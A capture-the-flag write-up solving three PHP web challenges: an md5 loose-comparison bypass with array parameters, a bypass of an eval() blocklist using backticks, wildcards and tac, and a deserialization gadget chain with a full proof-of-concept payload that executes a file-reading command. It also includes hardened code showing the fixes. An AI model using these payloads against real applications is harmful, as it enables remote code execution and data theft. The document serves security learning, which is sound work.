A web amateur doing a quick reproduction here; two of the challenges' environments were down, though.
s1mple_php
Challenge
easy
My solution:
Source:
<?php
highlight_file(__FILE__);
include("flag.php");
$c = $_POST['c'];
$v = $_GET['v'];
$e = $_GET['e'];
if(isset($_GET['v']) and isset($_GET['e'])){
    // loose (!=) comparison of the raw parameters
    if ($_GET['v'] != $_GET['e']){
        // loose (==) comparison of the two digests
        if ((md5($_GET['v']) == md5($_GET['e']))){
            if(isset($_POST['c'])){
                echo $flag;
            }else{
                die('no!!!');
            }
        }else{
            die('wrong!');
        }
    }else{
        die('wrong wrong !!');
    }
}else{
    die('wrong wrong wrong!!!');
}
?>
wrong wrong wrong!!!
A simple md5 weak-comparison bypass: v and e must differ while their md5 values compare equal. Arrays do it: v[]=123&e[]=456
c can be anything; just send some value.
Solved in seconds.
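As an added illustration (not part of the original writeup), here is the challenge's loose comparison next to the hardened form a reviewer would ask for. The helper names weak_check and strict_check are hypothetical; the inputs are constructed to match the writeup's query string, which PHP parses into arrays.

```php
<?php
// Added example, not from the original writeup. weak_check mirrors the
// challenge's logic; strict_check is the hardened form.

// Challenge logic: loose (!=, ==) comparisons on whatever arrived in the request.
// On PHP 7.x md5() of an array returns NULL with a warning, so NULL == NULL
// passes although v and e differ. On PHP 8 md5() throws a TypeError instead.
function weak_check($v, $e): bool
{
    try {
        return $v != $e && @md5($v) == @md5($e);
    } catch (TypeError $t) {
        return false;
    }
}

// Hardened form: only plain strings are acceptable, and the digests are
// compared strictly (hash_equals also avoids timing differences).
function strict_check($v, $e): bool
{
    if (!is_string($v) || !is_string($e)) {
        // A query parameter that arrives as an array (v[]=...) is a sign of
        // probing; reject it and leave a trace in the log.
        error_log('rejected non-string v/e parameter');
        return false;
    }
    return $v !== $e && hash_equals(md5($v), md5($e));
}

// Constructed inputs shaped like the writeup's v[]=123&e[]=456.
$v = ['123'];
$e = ['456'];

var_dump(weak_check($v, $e));         // PHP 7.x: bool(true) (the bypass); PHP 8: bool(false)
var_dump(strict_check($v, $e));       // bool(false) on any version
var_dump(strict_check('abc', 'abc')); // bool(false): identical inputs are rejected
```

The is_string gate is the part that matters: once the parameters are guaranteed to be strings, `===` and hash_equals behave as the author of the original check assumed `==` would.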
Challenge
Can you RCE?
My solution:
Source:
<?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
$c = $_POST['c'];
// blocklist: "(", "." and "cat" are each replaced by a space, then the rest is eval()ed
$c = str_replace("("," ",$c);
$c = str_replace("."," ",$c);
$c = str_replace("cat"," ",$c);
eval($c);
?>
Analysis shows it blocks "(", "." and "cat"; we can bypass that with backticks `, the wildcard *, and tac.
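A blocklist in front of eval() is not a fix, as the bypass above shows. As an added example (not code from the challenge or the writeup), the pattern that actually removes the problem: the client sends an action name, the server maps it to fixed code, and anything else is refused and logged. The action names and handlers are hypothetical.

```php
<?php
// Added example, not from the original writeup: an allowlist dispatcher in
// place of str_replace() + eval(). User input selects a handler; it never
// becomes code.

function action_time(array $args): string
{
    return date('c');
}

function action_upper(array $args): string
{
    return strtoupper((string)($args['text'] ?? ''));
}

function run_action(string $action, array $args): string
{
    // Hypothetical allowlist: action name -> fixed handler function.
    $allowed = [
        'time'  => 'action_time',
        'upper' => 'action_upper',
    ];
    if (!array_key_exists($action, $allowed)) {
        // An unknown action is a request worth logging, not one to sanitise.
        error_log('rejected action: ' . $action);
        return 'no';
    }
    return $allowed[$action]($args);
}

// Constructed requests: a legitimate one and one that tries to supply code.
echo run_action('upper', ['text' => 'hello']), "\n"; // HELLO
echo run_action('echo 1;', []), "\n";                 // no (logged, never executed)
```

The difference from the challenge is structural: there is no string that reaches an interpreter, so there is nothing for a filter to miss.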
fxlh
Challenge
Can you build a chain?
My solution:
Source:
<?php
highlight_file(__FILE__);
class zzz
{
    public $z;
    function __construct($z)
    {
        $this->z = $z;
    }
    // runs when the object is freed; calls a method on $z
    function __destruct()
    {
        $this->z->pdf();
    }
}
class hhh
{
    public $h;
    // runs when an undefined method is called on an hhh object
    function __call($onename,$val)
    {
        echo $this->h->docx;
    }
}
class ccc
{
    public $c;
    function __construct($c)
    {
        $this->c = $c;
    }
    // runs when an undefined property is read on a ccc object
    function __get($Attribute)
    {
        eval($this->c);
    }
}
$p = $_GET['p'];
// keyword blocklist, then unrestricted unserialize()
if(isset($p) and !preg_match('/system/i',$p)) {
    unserialize($_GET['p']);
}else{
    die('no system!!!');
}
?>
no system!!!
First find the tail of the chain, then look for what triggers __get: here, in class hhh, the h property triggers it (echo $this->h->docx reads an undefined property of h).
Then look for what triggers __call: here, in class zzz, __destruct() triggers it (it calls pdf() on z, which hhh does not define).
Build the POC as follows:
<?php
class zzz
{
    public $z;
    function __destruct()
    {
        $this->z->pdf();
    }
}
class hhh
{
    public $h;
}
class ccc
{
    public $c = "echo `cat flag.php`;";
}
$en = new zzz();
$s = new hhh();
$e = new ccc();
$en->z = $s;   // zzz::__destruct calls $this->z->pdf() -> hhh::__call
$s->h = $e;    // hhh::__call reads $this->h->docx -> ccc::__get -> eval
echo serialize($en);
?>
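The challenge gates unserialize() with a keyword blocklist (/system/i), which the chain above never needs to match. As an added example (not part of the writeup), the same three classes are loaded once the challenge's way and once with allowed_classes => false, the setting that turns every object in the data into __PHP_Incomplete_Class so none of the application's magic methods can run. The eval() in ccc::__get is replaced by a harmless marker, and the payload is a constructed string with the same shape as the POC output.

```php
<?php
// Added example, not from the original writeup: the challenge's loader beside
// a hardened one. eval() is replaced by a marker so only the chain's reach is shown.

class zzz
{
    public $z;
    function __destruct()
    {
        $this->z->pdf();
    }
}
class hhh
{
    public $h;
    function __call($name, $args)
    {
        echo $this->h->docx;
    }
}
class ccc
{
    public $c;
    function __get($attr)
    {
        // Marker instead of eval($this->c): shows the chain reached its sink.
        echo "[ccc::__get reached, would eval() here]\n";
    }
}

// Constructed payload, same shape as the writeup's POC with a harmless body.
$payload = 'O:3:"zzz":1:{s:1:"z";O:3:"hhh":1:{s:1:"h";O:3:"ccc":1:{s:1:"c";s:8:"harmless";}}}';

function load_as_challenge(string $p)
{
    // Blocklist, then unrestricted unserialize(): objects of any class are built.
    if (preg_match('/system/i', $p)) {
        return null;
    }
    return unserialize($p);
}

function load_hardened(string $p)
{
    // No application class may be instantiated from user data.
    return unserialize($p, ['allowed_classes' => false]);
}

$o = load_as_challenge($payload);
echo get_class($o), "\n"; // zzz
unset($o);                // zzz::__destruct -> hhh::__call -> ccc::__get: marker printed

$o = load_hardened($payload);
echo get_class($o), "\n"; // __PHP_Incomplete_Class
unset($o);                // nothing printed: an incomplete class has no destructor
```

allowed_classes => false is the minimum; the cleaner fix is not to unserialize() user-controlled data at all and to carry structured input as JSON, where json_decode() produces only arrays and stdClass and no class code is reachable.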